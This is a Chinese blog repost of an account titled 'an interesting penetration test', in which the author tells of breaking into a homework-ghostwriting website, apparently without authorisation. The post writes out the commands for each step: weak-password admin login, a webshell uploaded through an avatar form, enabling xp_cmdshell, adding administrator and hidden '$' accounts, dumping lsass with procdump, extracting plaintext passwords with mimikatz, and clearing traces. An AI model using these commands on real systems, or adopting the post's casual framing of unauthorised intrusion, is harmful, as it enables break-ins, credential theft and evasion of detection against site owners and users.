记一次有趣的渗透测试

2019-07-16 约 649 字 预计阅读 2 分钟

声明:本文 【记一次有趣的渗透测试】 由作者 p0desta 于 2019-07-16 09:10:00 首发 先知社区 曾经 浏览数 171 次

感谢 p0desta 的辛苦付出!

别人都放假了我们却还在小学期中,这两天女朋友老是抱怨小学期作业难做,然后她今天发现淘宝上有人花钱代做,遂发来网址让我看看

咱也不知道,咱也不敢问

然后反手一个弱口令进了后台

其实这个站有注入,不过既然进了后台,那肯定要去shell啊,找了个学生的账号登陆进入发现了头像上传点可以任意文件上传

直接传了个大马,执行命令看下权限

这权限也太小了吧,先来提权,看下补丁

这还不随便打了,传了几个提权exe之后发现都执行不了,可能被杀软杀掉了,然后尝试抓hash

看来只有pwdump7.exe没被杀了,但是权限不够

现在我们的权限能去读一些文件,去翻一翻sqlserver的密码,尝试sqlserver来提权

开启xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

成了,有权限了,尝试加个管理员?

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组

Wtm,加不上啊,杀软拦了,再次使用pwdump7来抓hash

本来就开着3389,直接连上去

Wtm开着管家和金山,传的东西都被拦截了,关掉杀软,先加个隐藏用户

net user test$ pinohd123. /add
net localgroup administrators test$ add

这里lz1y告诉我也可以procdump去搞,procdump是官方的工具,不会被杀软杀

exec master..xp_cmdshell 'xxxx\images\button\Procdump.exe -accepteula -ma lsass.exe -o xxx.dmp'

把2.dmp存到本来来配合mimikatz

mimikatz.exe
sekurlsa::minidump 2.dmp
sekurlsa::logonPasswords full

同样拿到明文。

奈何没有域,擦了脚印溜了。

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now